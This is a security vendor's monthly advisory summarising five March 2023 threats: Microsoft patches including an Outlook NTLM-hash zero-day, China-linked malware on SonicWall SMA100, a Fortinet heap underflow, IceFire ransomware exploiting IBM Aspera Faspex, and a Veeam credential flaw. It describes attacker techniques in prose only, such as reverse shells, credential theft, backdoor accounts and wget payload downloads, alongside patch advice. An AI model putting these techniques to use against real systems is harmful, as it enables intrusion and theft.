Monthly Advisory • 10 MIN READ

March Threat Advisory – Top 5

by Eleanor Barlow • Mar 2023

SecurityHQ’s Monthly Threat Report, Drawn from Recent Advisories of March 2023.

Microsoft Released March 2023 Patch Tuesday for 83 Flaws, Including 2 Zero-day.

Threat Reference: Global

Risks: Privilege Elevation, Remote Code Execution and Security Feature Bypass

Advisory Type: Updates/Patches

Priority: Standard

Microsoft has released its March 2023 Patch Tuesday to fix 83 vulnerabilities which includes 2 Zero-Days and 09 Critical severity vulnerabilities. Successful exploitation of these vulnerabilities could result in Privilege Elevation, Security Feature Bypass, Remote Code Execution, Denial of Service, Information Disclosure and Chromium Vulnerability.

One of the zero-day vulnerabilities, Microsoft Outlook Elevation of Privilege Vulnerability, can allow a specially crafted email to force the victim’s endpoint to connect to a remote URL, and transmit the Windows account’s Net-NTLMv2 hash. The exploit can be executed even without user interaction.

Recommendations

• It is recommended to ensure 100% successful deployment of patch across all endpoints.

• Keep applications and operating systems running at the current released patch level.

• Deploy Endpoint Detection & Response (EDR) tools to detect latest malwares and suspicious activities on endpoints.

China-Linked (UNC4540) Deploys Malware in SonicWall SMA 100 Series.

Threat Reference: Global

Risks: Malware/Backdoor

Advisory Type: Threats

Priority: Standard

Security researchers have discovered a Chinese cyber campaign deploying malware in SonicWall SMA devices.

Affected Product: SonicWall SMA100

Tactics Techniques & Procedures (TTPs):

  • Malware uses TinyShell and bash scripts to steal hashed credentials from logged-in users by executing SQL commands.
  • Stolen credentials are copied to an attacker-controlled file and cracked offline.
  • TinyShell creates a reverse shell for remote access.
  • Legitimate SonicWall binary firebase is patched for malware stability during device shutdown.
  • Persistence is achieved through firmware updates and backup bash scripts.
  • Firmware updates bash script, adds malware and backdoor user named acme for long-term access.

Recommendation:

  • Monitor network traffic 24×7 for the presence of suspicious outgoing connections and presence of mentioned TTPs.
  • Having a backup plan in place and performing regular backups can help minimize the impact of a malware attack.
  • Segmenting the network into different subnets can help to limit the spread of malware.

Permanent Fix: It is recommended to upgrade SMA100 to version 10.2.1.7 or higher.

Fortinet Released Patches to Fix Critical Vulnerabilities Impacting FortiOS & FortiProxy.

Threat Reference: Global

Risks: Buffer Underflow

Advisory Type: Patches/Updates

Priority: Standard

Fortinet has released patches to fix buffer underflow vulnerability in FortiOS & FortiProxy administrative interface as remote attacker can execute arbitrary code on the device and can perform a DoS attack on the GUI, via specifically crafted requests.

Critical – Heap buffer underflow in administrative interface.

The affected products are: FortiOS version 7.2.0 through 7.2.3, FortiOS version 7.0.0 through 7.0.9, FortiOS version 6.4.0 through 6.4.11, FortiOS version 6.2.0 through 6.2.12, FortiOS 6.0 all versions, FortiProxy version 7.2.0 through 7.2.2, FortiProxy version 7.0.0 through 7.0.8, FortiProxy version 2.0.0 through 2.0.11, FortiProxy 1.2 all versions, FortiProxy 1.1 all versions.

Recommendation: It is recommended to update all the affected products to the latest available patch version.

IceFire Ransomware New Variant Targets Linux and Windows Systems.

Threat Reference: Global

Risks: Ransomware

Advisory Type: Threats

Priority: Standard

Security researchers discovered a new variant of IceFire ransomware that is targeting Linux Systems by exploiting a vulnerability affecting IBM Aspera Faspex file-sharing software. The vulnerability allows an unauthenticated remote attacker to execute arbitrary code due to a YAML deserialization flaw.

After successful exploitation on the targeted system, it uses wget to download two payloads and save them to ‘/opt/aspera/faspex’ path. It then executes the IceFire ransomware payloads, which encrypts the targeted system files and appends the ‘.ifire’ extension to the filename. It also removes binaries and the payload from the system after successful encryption.

Recommendations:

• Deploy Endpoint Detection & Response (EDR) tools to detect latest malwares and suspicious activities on endpoints.

• Ensure IT Infrastructure is monitored 24×7 for presence of malicious activities. Specially WAF, to prevent and detect such exploits.

• It is recommended to Patch and Update Systems regularly.

Veeam Fixed High-Severity Vulnerability Impacting Veeam Backup & Replication.

Threat Reference: Global

Risks: Unauthorized Access

Advisory Type: Updates/patches

Priority: Standard

Veeam fixed a high severity vulnerability for all versions of Backup & Replication services. Successful exploitation of this vulnerability will allow an attacker to access backup infrastructure after obtaining encrypted credentials stored in database.

Recommendations:

It is recommended to update affected products to the latest version available.

Having conducted incident response investigations across a wide range of industries, SecurityHQ are best placed to work with businesses large and small, and across numerous technical environments to reduce the impact of a cyber security incident. For more information on these threats, speak to an expert here. Or if you suspect a security incident, you can report an incident here.